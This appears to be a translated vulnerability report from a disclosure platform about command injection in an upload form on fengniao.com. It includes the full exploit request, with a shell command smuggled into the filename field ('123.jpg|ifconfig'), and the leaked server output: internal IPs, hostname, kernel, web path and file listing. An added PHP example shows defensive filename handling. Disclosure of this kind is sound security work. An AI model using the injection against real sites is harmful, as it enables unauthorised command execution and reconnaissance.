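2015-11-11: Details reported to the vendor; awaiting vendor handling
2015-11-11: Vendor confirmed; details disclosed to the vendor only
2015-11-21: Details disclosed to core white hats and experts in related fields
2015-12-01: Details disclosed to regular white hats
2015-12-11: Details disclosed to intern white hats
2015-12-26: Details disclosed to the public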
POST /topic/seagate/upload.php HTTP/1.1
Host: www.fengniao.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.fengniao.com/topic/seagate/upload.php
Cookie: __utma=1727398.213344896.1446190154.1446190154.1446190154.1; __utmb=1727398.5.10.1446190154; __utmc=1727398; __utmz=1727398.1446190154.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; mltn=@4~6171412388184999580>1>1446190123461>1>1446190123461>6171412388184999579>1446190123461@; mlti=@4~144619015498015232@; mlts=@4~5@; ip_ck=5cWA5fj2j7QuMjIxMjIxLjE0NDYxOTAxMjQ%3D; lv=1446190160; vn=1; z_pro_city=s_provice%3Dbeijingshi%26s_city%3D; Hm_lvt_916ddc034db3aa7261c5d56a3001e7c5=1446190399; Hm_lpvt_916ddc034db3aa7261c5d56a3001e7c5=1446190406; bdshare_firstime=1446190400217
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------157521457315459
Content-Length: 4699

-----------------------------157521457315459
Content-Disposition: form-data; name="tijiao"

1
-----------------------------157521457315459
Content-Disposition: form-data; name="username"

11111
-----------------------------157521457315459
Content-Disposition: form-data; name="realname"

111
-----------------------------157521457315459
Content-Disposition: form-data; name="age"

11
-----------------------------157521457315459
Content-Disposition: form-data; name="city"

1111111
-----------------------------157521457315459
Content-Disposition: form-data; name="mobile"

1111111
-----------------------------157521457315459
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------157521457315459
Content-Disposition: form-data; name="title"

1111111
-----------------------------157521457315459
Content-Disposition: form-data; name="filename"; filename="123.jpg|ifconfig"
Content-Type: image/jpeg

ÿØÿà
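The problem is in the uploaded file name, the filename parameter: Content-Disposition: form-data; name="filename"; filename="123.jpg|ifconfig". Using the pipe character (|) in the file name, arbitrary system commands can be executed.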
eth0 Link encap:Ethernet HWaddr 00:50:56:B4:AD:E2
     inet addr:10.15.184.191 Bcast:10.15.191.255 Mask:255.255.248.0
     UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
     RX packets:3346812881 errors:0 dropped:0 overruns:0 frame:0
     TX packets:2278368580 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:1000
     RX bytes:1366729260678 (1.2 TiB) TX bytes:607313144058 (565.6 GiB)

eth1 Link encap:Ethernet HWaddr 00:50:56:B4:E5:D9
     UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
     RX packets:103585252 errors:0 dropped:0 overruns:0 frame:0
     TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:1000
     RX bytes:6274065644 (5.8 GiB) TX bytes:4104 (4.0 KiB)

eth2 Link encap:Ethernet HWaddr 00:50:56:B4:04:DB
     UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
     RX packets:103570105 errors:0 dropped:0 overruns:0 frame:0
     TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:1000
     RX bytes:6273140102 (5.8 GiB) TX bytes:3762 (3.6 KiB)

eth3 Link encap:Ethernet HWaddr 00:50:56:B4:33:48
     UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
     RX packets:103553778 errors:0 dropped:0 overruns:0 frame:0
     TX packets:11 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:1000
     RX bytes:6272150125 (5.8 GiB) TX bytes:3762 (3.6 KiB)

lo   Link encap:Local Loopback
     inet addr:127.0.0.1 Mask:255.0.0.0
     UP LOOPBACK RUNNING MTU:16436 Metric:1
     RX packets:141456524 errors:0 dropped:0 overruns:0 frame:0
     TX packets:141456524 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:0
     RX bytes:34148334880 (31.8 GiB) TX bytes:34148334880 (31.8 GiB)

lo:0 Link encap:Local Loopback
     inet addr:10.15.187.253 Mask:255.255.255.255
     UP LOOPBACK RUNNING MTU:16436 Metric:1
Linux c25-fn-bbs-web3.cnet.com.cn 2.6.18-308.4.1.el5.centos.plus #1 SMP Tue Apr 17 21:00:16 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux
Current directory: /export/home/cms/www.fengniao.com/www/topic/seagate
apache
1.html1.php22.phpadmin_ranks.phpadmin_ranks1.phpc_data.phpcomment.phpcounts.phpcssdelete.phpdocdongtai.phpentries.phperror.phpfunction1.phphuojiang.phpiframe.phpiframe1.phpimagesincludeindex.phpindex1.phpindex_1.phpindex_2.phpindex_old.phpjslist.phpnext.phpphoto_list.phppic.phppost.phpproductt.htmltest.htmlupload.phpupload_c.phpuser_pic.phpuser_pic1.phpuser_pic2.phpvote.phpxin.jpgzhiye.php
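One way to handle the upload's file name so that it can never reach a shell, as an added example that is not code from this report or from the affected site. The report does not show the server code, so the root cause in the comments is an assumption; `storedNameFor()`, `thumbnailCommand()`, the `convert` invocation and the sample inputs are hypothetical.

```php
<?php
// Added example, not the site's code. Assumption: the upload handler built a
// shell command from the client-supplied filename, so "|ifconfig" was executed.

// Allowed extensions mapped to the magic bytes the content must start with.
const ALLOWED = ['jpg' => "\xFF\xD8\xFF", 'png' => "\x89PNG\r\n\x1A\n"];

/**
 * Returns a server-generated storage name, or null when the upload is rejected.
 * The client filename only supplies an extension hint; it never becomes part
 * of a path or a command line.
 */
function storedNameFor(string $clientName, string $bytes): ?string
{
    // Strict allowlist: one short base name, one dot, one extension.
    // Anything else ("|", ";", "/", spaces, a second dot) is rejected.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})\z/', $clientName, $m)) {
        return null;
    }
    $ext = strtolower($m[1]) === 'jpeg' ? 'jpg' : strtolower($m[1]);
    if (!array_key_exists($ext, ALLOWED)) {
        return null;
    }
    // The content must match the claimed type, not just the name.
    $magic = ALLOWED[$ext];
    if (strncmp($bytes, $magic, strlen($magic)) !== 0) {
        return null;
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/** Hypothetical external step: every argument is quoted before reaching a shell. */
function thumbnailCommand(string $src, string $dst): string
{
    return 'convert ' . escapeshellarg($src) . ' -resize 200x200 ' . escapeshellarg($dst);
}

// Constructed sample inputs: a JPEG header, then the three cases of interest.
$jpeg = "\xFF\xD8\xFF\xE0" . str_repeat("\0", 16);
var_dump(storedNameFor('123.jpg|ifconfig', $jpeg)); // filename from the request above
var_dump(storedNameFor('123.jpg', $jpeg));          // well-formed name, JPEG content
var_dump(storedNameFor('123.jpg', '<?php'));        // image name, non-image content
echo thumbnailCommand('/tmp/up/123.jpg|ifconfig', '/tmp/thumb.jpg'), PHP_EOL;
```

Where the processing can be done in-process instead of through an external command, no argument quoting is needed at all.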
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-11-11 14:31
Thank you very much.
None yet.